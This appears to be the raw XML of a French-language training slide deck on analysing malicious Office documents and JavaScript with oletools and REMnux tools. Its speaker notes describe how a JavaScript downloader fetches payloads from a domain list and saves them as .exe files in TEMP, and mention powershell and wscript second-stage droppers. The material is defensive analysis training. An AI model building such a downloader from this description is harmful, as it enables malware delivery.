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81"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId82"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="338" r:id="rId2"/>
    <p:sldId id="374" r:id="rId3"/>
    <p:sldId id="375" r:id="rId4"/>
    <p:sldId id="376" r:id="rId5"/>
    <p:sldId id="377" r:id="rId6"/>
    <p:sldId id="347" r:id="rId7"/>
    <p:sldId id="349" r:id="rId8"/>
    <p:sldId id="350" r:id="rId9"/>
    <p:sldId id="351" r:id="rId10"/>
    <p:sldId id="353" r:id="rId11"/>
    <p:sldId id="355" r:id="rId12"/>
    <p:sldId id="357" r:id="rId13"/>
    <p:sldId id="425" r:id="rId14"/>
    <p:sldId id="426" r:id="rId15"/>
    <p:sldId id="358" r:id="rId16"/>
    <p:sldId id="427" r:id="rId17"/>
    <p:sldId id="493" r:id="rId18"/>
    <p:sldId id="494" r:id="rId19"/>
    <p:sldId id="495" r:id="rId20"/>
    <p:sldId id="428" r:id="rId21"/>
    <p:sldId id="339" r:id="rId22"/>
    <p:sldId id="359" r:id="rId23"/>
    <p:sldId id="360" r:id="rId24"/>
    <p:sldId id="361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430" r:id="rId37"/>
    <p:sldId id="368" r:id="rId38"/>
    <p:sldId id="371" r:id="rId39"/>
    <p:sldId id="372" r:id="rId40"/>
    <p:sldId id="373" r:id="rId41"/>
    <p:sldId id="379" r:id="rId42"/>
    <p:sldId id="433" r:id="rId43"/>
    <p:sldId id="443" r:id="rId44"/>
    <p:sldId id="434" r:id="rId45"/>
    <p:sldId id="436" r:id="rId46"/>
    <p:sldId id="437" r:id="rId47"/>
    <p:sldId id="438" r:id="rId48"/>
    <p:sldId id="439" r:id="rId49"/>
    <p:sldId id="440" r:id="rId50"/>
    <p:sldId id="507" r:id="rId51"/>
    <p:sldId id="442" r:id="rId52"/>
    <p:sldId id="444" r:id="rId53"/>
    <p:sldId id="445" r:id="rId54"/>
    <p:sldId id="508" r:id="rId55"/>
    <p:sldId id="446" r:id="rId56"/>
    <p:sldId id="447" r:id="rId57"/>
    <p:sldId id="423" r:id="rId58"/>
    <p:sldId id="448" r:id="rId59"/>
    <p:sldId id="370" r:id="rId60"/>
    <p:sldId id="342" r:id="rId61"/>
    <p:sldId id="450" r:id="rId62"/>
    <p:sldId id="449" r:id="rId63"/>
    <p:sldId id="451" r:id="rId64"/>
    <p:sldId id="378" r:id="rId65"/>
    <p:sldId id="452" r:id="rId66"/>
    <p:sldId id="453" r:id="rId67"/>
    <p:sldId id="454" r:id="rId68"/>
    <p:sldId id="455" r:id="rId69"/>
    <p:sldId id="456" r:id="rId70"/>
    <p:sldId id="457" r:id="rId71"/>
    <p:sldId id="343" r:id="rId72"/>
    <p:sldId id="268" r:id="rId73"/>
    <p:sldId id="460" r:id="rId74"/>
    <p:sldId id="461" r:id="rId75"/>
    <p:sldId id="390" r:id="rId76"/>
    <p:sldId id="464" r:id="rId77"/>
    <p:sldId id="465" r:id="rId78"/>
    <p:sldId id="420" r:id="rId79"/>
    <p:sldId id="46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961" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95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ecalage.info/python/oletool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ecalage.info/python/oletool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Embellit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> le JS et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>l’execute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dans</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> un bac a sable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err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Commandes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> interactives</a:t>
          </a:r>
        </a:p>
        <a:p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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1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js_beautify</a:t>
          </a:r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</a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1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js_analyze</a:t>
          </a:r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L’implémentation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> JS de Mozilla</a:t>
          </a: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Modifié</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> pour </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>écriture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dans</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>fichier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quand</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> JS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>est</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> execute :</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>	- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>eval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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>	- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>document.write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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>	- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>window.navigate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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Sous </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Remnux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1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js-didier</a:t>
          </a:r>
          <a:r>
            <a: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JSFILE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 custScaleY="120634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Olebrowse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voir</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les streams</a:t>
          </a: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Oletimes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extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les chronologies</a:t>
          </a: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Oleid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cherche</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>caracteristiques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malicieuses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Olevba</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> : </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les scripts VBA</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/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Repository : </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="24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https://www.decalage.info/python/oletools</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> 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Y="484794" custLinFactNeighborX="1809" custLinFactNeighborY="500000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 custFlipVert="1" custScaleY="4539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 custLinFactNeighborX="2612" custLinFactNeighborY="38084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12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128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Embellit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> le JS et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>l’execute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dans</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> un bac a sable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128"/>
        <a:ext cx="5341938" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="232121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540671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FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Commandes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> interactives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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200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js_beautify</a:t>
          </a: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chemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200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js_analyze</a:t>
          </a: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file JSFILE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540671"/>
        <a:ext cx="5341938" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5079213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79213"/>
          <a:ext cx="5341938" cy="17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79213"/>
        <a:ext cx="5341938" cy="170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4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44"/>
          <a:ext cx="5336721" cy="27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L’implémentation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> JS de Mozilla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Modifié</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> pour </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>écriture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dans</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>fichier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quand</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> JS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>est</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> execute 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- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>eval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- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>document.write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- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>window.navigate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44"/>
        <a:ext cx="5336721" cy="2783950"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2586989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786495"/>
          <a:ext cx="5341938" cy="230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Sous </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Remnux</a:t>
          </a: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	</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>js-didier</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1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 JSFILE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786495"/>
        <a:ext cx="5341938" cy="2307766"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="509426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94261"/>
          <a:ext cx="5341938" cy="154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94261"/>
        <a:ext cx="5341938" cy="154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778"/>
          <a:ext cx="568769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778"/>
          <a:ext cx="5687695" cy="276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Olebrowse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voir</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les streams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Oletimes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extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les chronologies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Oleid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cherche</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>caracteristiques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malicieuses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Olevba</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> : </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>extraire</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> les scripts VBA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0" y="778"/>
        <a:ext cx="5687695" cy="2761194"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3563152"/>
          <a:ext cx="568769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 flipV="1">
          <a:off x="0" y="2761973"/>
          <a:ext cx="5687695" cy="12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 rot="10800000">
        <a:off x="0" y="2761973"/>
        <a:ext cx="5687695" cy="125330"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3938877"/>
          <a:ext cx="568769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2887304"/>
          <a:ext cx="5687695" cy="276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Repository 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https://www.decalage.info/python/oletools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</a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2887304"/>
        <a:ext cx="5687695" cy="276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méthode la plus courante d’utilisation malveillante est celle des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armé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(indicateurs malveillants) et à analyser ce qu'ils font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 documents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tels que JavaScript sont généralement ceux qui permettent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compromission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 documents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tels que JavaScript sont généralement ceux qui permettent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compromission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déclenche l'exploit et télécharge ou dépose d'autres logiciels malveillants (second stage)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envoyés directement en pièces jointes généralement dans un fichier zip o avec multiples extensions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 web, en particulier dans celles qui sont créées par des kits d'attaque web (drive-by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de toute analyse est de récupérer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démarche logique systématique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répétable (« ana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lysis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d’assurer la protection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emplacements réseau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à partir desquels des fichiers supplémentaires pourraient être téléchargés – souvent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plusieurs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ATTN – il y a aussi des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bénignes.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invoquent des commandes externes (ex.powershell.exe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wscript.exe) pour dropper le second-stage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9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Découvrir le nom du fichier qu'un script appelle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pour comprendre le second stage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pour trouver d'autres systèmes compromis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Variables initialisées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1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Noms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de domaine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Détection et récupération des scripts JS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3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Noms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de domaine dans un tableau (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) séparés par un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>escpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ommande « split »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6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 b  Noms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de domaine dans un tableau (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) séparés par un espace - c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ommande « split »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>  On obtient le nom du répertoire TEMP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1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 b  Noms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de domaine dans un tableau (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) séparés par un espace - c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ommande « split »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>  On obtient le nom du répertoire TEMP + la valeur du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>resultat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> de la commande String et 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Strin.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>() – retourne le</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> char qui à la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>représentation numérique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>passé en argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>www.asciitable.com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9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Loop incrémental qui itère</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de 0 (variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>lenght</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> de var b ( nb d’éléments 2)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0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GET d’un URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le tableau des</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> est référencé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retour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> HTTP 200  la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> est ouverte et sauvegardée dans un fichier dont le nom est composé par la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>concatenation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fn + i + .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exe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retour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> HTTP 200  la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> est ouverte et sauvegardée dans un fichier dont le nom est composé par la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>concatenation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fn + i + .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exe</a:t>
